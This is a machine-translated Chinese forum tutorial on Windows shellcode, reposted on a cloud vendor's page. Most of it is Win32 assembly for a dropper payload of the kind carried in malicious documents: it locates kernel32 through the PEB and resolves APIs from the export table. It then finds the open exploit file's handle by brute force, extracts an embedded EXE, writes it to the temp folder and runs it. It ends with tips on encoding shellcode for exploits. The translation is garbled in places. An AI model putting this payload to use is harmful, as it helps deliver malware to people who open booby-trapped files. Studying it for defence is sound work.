Shellcode Analysis in windows

Source: Internet
Author: User
Tags readfile
Question: [original] shellcode Analysis in Windows
Author: snowdbg
Time: 2009-10-06,11: 12
Chain: http://bbs.pediy.com/showthread.php? T = 99007

Today is the Mid-Autumn Festival, and my article is basically completed today. As a gift for the Mid-Autumn Festival, I hope you can criticize and correct me a lot because of my limited level!
After studying for a few days, my thinking is always messy. These days I decided to develop a good habit and write some summary articles on some things I learned so that I could sum up and summarize them, in addition, we can have a deeper and more systematic understanding of its technical principles. Today, let's start with shellcode!
When talking about shellcode, it may be a bit confused. I don't know what it is, and it may be mysterious. it is rarely mentioned in its professional explanation, today, we will make a full analysis of shellcode in Windows from the following aspects:
1. History and definition of shellcode
2. Common Types of shellcode in Windows
3. Write a simple shellcode
4. shellcode format and encoding method
5. shellcode in Exploit
Now let's figure out these problems one by one!
1. History and definition of shellcode:
For shellcode's development history, failewest's book "0-day security: software vulnerability analysis technology" clearly states that a short section is cited here:
"In 1996, Aleph One published THE famous paper" smashing the stack for fun and profit "in Underground, which details the stack structure in Linux AND how to use STACK-based buffer overflow. In this epoch-making paper, Aleph One demonstrates how to implant a piece of code in the process for obtaining shell, in this paper, the code of the implanted process is 'shellcode '.

Later, people simply used the specific term shellcode to refer to the code of the process embedded in the buffer overflow attack. This code can pop up a message box for the purpose of prank, or it can be used to delete and modify important files, steal data, upload and run Trojan viruses for the purpose of attack, format the hard disk for destruction."

In fact, currently, shellcode is widely used, and even some remote control software can make itself into a shellcode form. We only need to understand that this is a piece of code that is a bad thing after overflow. (The shellcode mentioned in this article is also the shellcode related to overflow)
2. Common Types of shellcode in windows
Here, I will classify the functions directly:
(1) Rebound Port Class (shell)
This is a real primitive shellcode, which has to be mentioned
(2) download and execute the class (download & exec)
This is the simplest type of shellcode, which is also the most widely used.
(3) Generate and run the executable file class (bindfile)
Why is there such a type of shellcode? Think about it. If the bad guys who make vulnerabilities bind the first two types of shellcode to an application exploit, there will be some unexpected situations:
A) What if your bounce behavior is blocked by the firewall?
B) What should I do if the other party is highly aware of opening files such as Doc and PDF without breaking the network?
Ah ~, Some bad guys think of these problems for us. They also bound their EXE to exploit. The shellcode function is to release the EXE and then run it. (This method is a bit evil)
3. Write a simple shellcode
Well, I have mentioned so much nonsense before, and I should be able to practice it later.
For ease of explanation, I will choose to use Win32 assembly for writing. (Of course, I am more familiar with C) there are many examples of the first two types of shellcode. Here I will introduce the compilation of the bindfile class shellcode.
First, let's take a look at the figure:
Views: 1360
File Size: 26.8 kb "style =" margin: 2px "alt =" Name: 1.jpg
Views: 1360
File Size: 26.8 kb "src =" http://bbs.pediy.com/attachment.php? Attachmentid = 32768 & D = 1254798295 "onLoad =" If (this. width> screen. width * 0.6) {This. width = screen. width * 0.6; this. alt = ''; this. onmouseover = This. style. cursor = 'pointer '; this. onclick = function () {window. open ('HTTP: // bbs.pediy.com/attachment.php? Attachmentid = 32768 & D = 1254798295 ')} "border =" 0 ">
This figure is drawn based on the Shellcode Execution Process, which will be explained one by one.
In fact, shellcode is a self-developed and fully functional code, but it cannot directly call API functions, because it is not running in the compiler environment and does not include to declare functions, there is no function table for the application. Therefore, shellcode needs to find its own API function address and then forcibly call it.
(1) Find the kernel32.dll base address:
The APIs used in the shellcode are generally unrelated to the user interface, because it is used in kernel32.dll to do bad things. Therefore, we must first find the base address of kernel32 to further find the specific address of each API.
There are many ways to obtain the api base address. Here I will talk about the simplest one (which combines the practical experience of many experts ):
Use PEB to find the kernel32 base address: code:

Assume fs: nothing mov eax, fs: [30 h] test eax, eax js OS _9xos_nt: mov eax, [eax + 0ch] mov esi, [eax + 1ch] lodsd mov eax, [eax + 8] jmp k_finishedos_9x: mov eax, [eax + 34 h] mov eax, [eax + 7ch] mov eax, [eax + 3ch] k_finished: sub esp, 200 mov edi, esp mov [edi + 8], eax; get kernel32 address

The above Code may not be quite clear to everyone. Let's take a look:
Views: 1348
File Size: 14.8 KB "style =" margin: 2px "alt =" Name: 2.JPG
Views: 1348
File Size: 14.8 kb "src =" http://bbs.pediy.com/attachment.php? Attachmentid = 32769 & D = 1254798295 "onLoad =" If (this. width> screen. width * 0.6) {This. width = screen. width * 0.6; this. alt = ''; this. onmouseover = This. style. cursor = 'pointer '; this. onclick = function () {window. open ('HTTP: // bbs.pediy.com/attachment.php? Attachmentid = 32769 & D = 1254798295 ')} "border =" 0 ">
As to why is the base address of Kernel32 put here, we need to thank those experienced experts who have designed it like this. However, it is not easy to find such a general method. At the same time, the 9x system is also judged in the code. I believe you can see what it means through the above figure.
In fact, there are several dynamic search methods with clear ideas. You can find related articles on your own. I like to be lazy ~
(2) Find the API function address
The base address of Kernel32 is found above, but how can we get the specific API function address? The PE file format is involved here. Here, I will only explain how to find the function address in the function extraction table from the DLL file: (the class has been axe, smile ~)
A. Get the e_lfanewc address at the Kernel32 base address + 0x3c, and you can get the PE Header.
B. Obtain the function output table address at 0x78 of the PE Header offset.
C. Obtain addressoffunctions, addressofnames, addressofnameordinalse at the 0x1 offset of the picking table.
D. addressoffunctions and addressofnames are two arrays corresponding to the function address and function name through addressofnameordinalse one by one.
E. The calculation is as follows:
Search AddressOfNames and determine the index corresponding to "GetProcAddress;
Index = AddressOfNameOrdinalse [index];
Function address = AddressOfFunctions [index];
Code: code:

FindApi:; get API function address push ebp push edi mov ebp, edi mov ebx, esp add ebx, 8 xor edx, edx mov eax, [ebp + 8] add eax, 3ch; point to PE header offset value e_lfanew mov eax, [eax]; get e_lfanew value add eax, [ebp + 8]; point to PE header cmp dword ptr [eax], 4550 h; determine whether it is 'pe' jne NotFound; kernel32 base address error mov [ebp + 0ch], eax; save PE File Header mov eax, [eax + 78 h] add eax, [ebp + 8] mov [ebp + 0ch], eax; pointing to IMAGE_EXPORT_DIRECTORY mov eax, [eax + 20 h] add eax, [ebp + 8] mov [ebp + 4], eax; save mov ecx, [ebp + 0ch] mov ecx, [ecx + 14 h] FindLoop: push ecx mov eax, [eax] add eax, [ebp + 8] mov esi, ebx add esi, 8 mov edi, eax mov ecx, [ebx + 4] cld repe cmpsb jne FindNext add esp, 4 mov eax, [ebp + 0ch] mov eax, [eax + 1ch] add eax, [ebp + 8] shl edx, 2 add eax, edx mov eax, [eax] add eax, [ebp + 8] jmp FoundFindNext: inc edx add dword ptr [ebp + 4], 4 mov eax, [ebp + 4] pop ecx loop FindLoopNotFound: xor eax, eaxFound: pop edi pop ebp ret

(3) Locating exe file data
The API address is also found, and the rest is the implementation function. The first thing we think of is to find the data of the exe. Then we put it into ReadFile and then CreateFile and WriteFile. However, we are faced with the following two problems:
How to find the exe data?
This is a good answer. The exe data is in our exploit file, and it will be difficult;
How to locate the exploit file?
We can consider two methods:
First, you can use CreateFile to open the exploit file and obtain the data. However, this method still faces difficulties in obtaining the exploit file path. Of course, there are still some methods;
The second method is to find the file handle of exploit. Here we will first discuss a logical relationship, which is why we can use this method. The reason is very simple: Your exploit has actually been opened, you just don't know its handle. In this way, as long as we can group the handle, we can directly read the exe file data in exploit through the handle.
The advantages and disadvantages of the above two methods are obvious. The second method is more universal. Although the first method can be implemented in a more clever way, it is relatively difficult and difficult to understand, so I will introduce the second method as an example, that is, the group handle method: code:

Mov dword ptr [edi + 68 h], 1000 h; set the length of the exe file exelen xor esi, esisHandle: inc esi push 0 push esi call dword ptr [edi + 10 h] cmp eax, 1536; exploit file size jne sHandle mov [edi + 3ch], eax mov [edi + 40 h], esi; give a valid handle according to the file size group

One thing to do here is to apply for a space to store the exe file data during ReadFile and Writefile, Which is solved by GlobalAlloc and GlobalFree, this does not need to be explained in detail. Code:

Push [edi + 3ch] push 40 call dword ptr [edi + 20 h] mov [edi + 60 h], eax; apply for memory space to store the exe file data read out mov esi, esp add esi, 100 h push esi push 50 h call dword ptr [edi + 18 h] mov ebx, esi mov [edi + 44 h], esi add ebx, eax add ebx, 8 mov eax, esp mov esp, ebx push 'E' push 'xe. a' sub esp, 8 mov esp, eax; get the path of the temporary folder, and append the exe file name push 0 push 2 push 2 push 0 push 3 push 40000000 h mov ebx, [edi + 44 h] push ebx call dword ptr [edi + 1ch]; create an exe file mov [edi + 48 h] based on the exe file path, eax push 2 push 0 push 200 push dword ptr [edi + 40 h] call dword ptr [edi + 14 h]; set file pointer push 0 lea ebx, dword ptr [edi + 64 h] push ebx push dword ptr [edi + 68 h] push dword ptr [edi + 60 h] push dword ptr [edi + 40 h] call dword ptr [edi + 28 h]; read the specified length push 0 lea ebx, dword ptr [edi + 64 h] push ebx push dword ptr [edi + 68 h] push dword ptr [edi + 60 h] push dword ptr [edi + 48 h] call dword ptr [edi + 2ch]; write the read exe file data to the exe file

(4) Generate and run the exe
This is relatively simple. Let's look at the code:

Mov ebx, [edi + 40 h] call dword ptr [edi + 30 h]; CloseHandle mov ebx, [edi + 48 h] push ebx call dword ptr [edi + 34 h]; final target, run the exe file

(5) clean the battlefield and flash people
Of course, the first thing is to release the previously applied memory space, and then use an exitprocess to end it all. One is to be considerate, and the other is to save time: code:

Push dword ptr [edi + 60 h] call dword ptr [edi + 24 h]; clear the battlefield GlobalFreepush 0 call dword ptr [edi + 38 h]; exitprocess exits the process, to prevent the process from getting stuck or reporting errors

4. Automatic shellcode Extraction
The shellcode written above is compiled by sink. We won't copy it directly to exploit for execution. The cpu recognizes the machine code, so after you control the eip, you must point it to the commands that the cpu can recognize. Therefore, we have to convert the compilation code into machine code. There are many methods to publish the code on the Internet. Here we will introduce a simple method: Since you are writing the code with a sink, your code is in. the memory of the code segment should be a machine code directly. You only need to mark the start and end, and then export it directly from there.
Check the code:

.386    .model flat, stdcall    option casemap:noneinclude    user32.incinclude    kernel32.incincludelib  kernel32.libincludelib  user32.lib    .datasc_out    db  'sc_out.txt',0exelen    dd  1000h    .data?sc_start  dd  ?sc_end    dd  ?sc_len    dd  ?out_handle  dd  ?out_buff  dd  ?dwsize    dd  ?    .codestart:  jmp scEnd;  scStart:        ……scEnd:  mov  sc_start,scStart  mov  sc_end,  scEnd  mov  ebx,sc_end  sub  ebx,sc_start  mov  sc_len,ebx  invoke  CreateFile,offset sc_out,40000000h,3,0,2,2,0  mov  out_handle,eax    lea  ebx,scStart  mov  out_buff,ebx  invoke  WriteFile,out_handle,out_buff,sc_len,addr dwsize,0    invoke  CloseHandle,out_handle    end start

5. shellcode in exploit
In exploit, sometimes shellcode needs to be put into exploit in different forms due to different string format requirements in concealed scripts, str 0x00 disconnection restrictions, and JavaScript scripts. The following sections describe one by one:
(1) Concealment
This is generally a simple code for shellcode, such as an exclusive or
(2) Str 0x00 disconnection limit
Sometimes shellcode is passed in as a parameter of a problematic function. At this time, the integrity of the passed shellcode must be considered, because in the string, 0x00 will usually disconnect the string, therefore, you must use the shellcode method to avoid the occurrence of 0x00.
(3) unescape in JavaScript
All variables in JavaScript basically exist in the form of strings or in the form of unescape, without the concept of byte. Therefore, for some variables such as 0x00, 0x01 and so on, these non-strings cannot be expressed. It is better to use its unescape to exist, so we must convert the shellcode into its format and put it in exploit, this is usually seen in JavaScript overflow exploitation.

I have written so much without knowing it. Due to my limited level of knowledge and ability to express myself, there may be errors. I hope you can criticize and correct me!

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.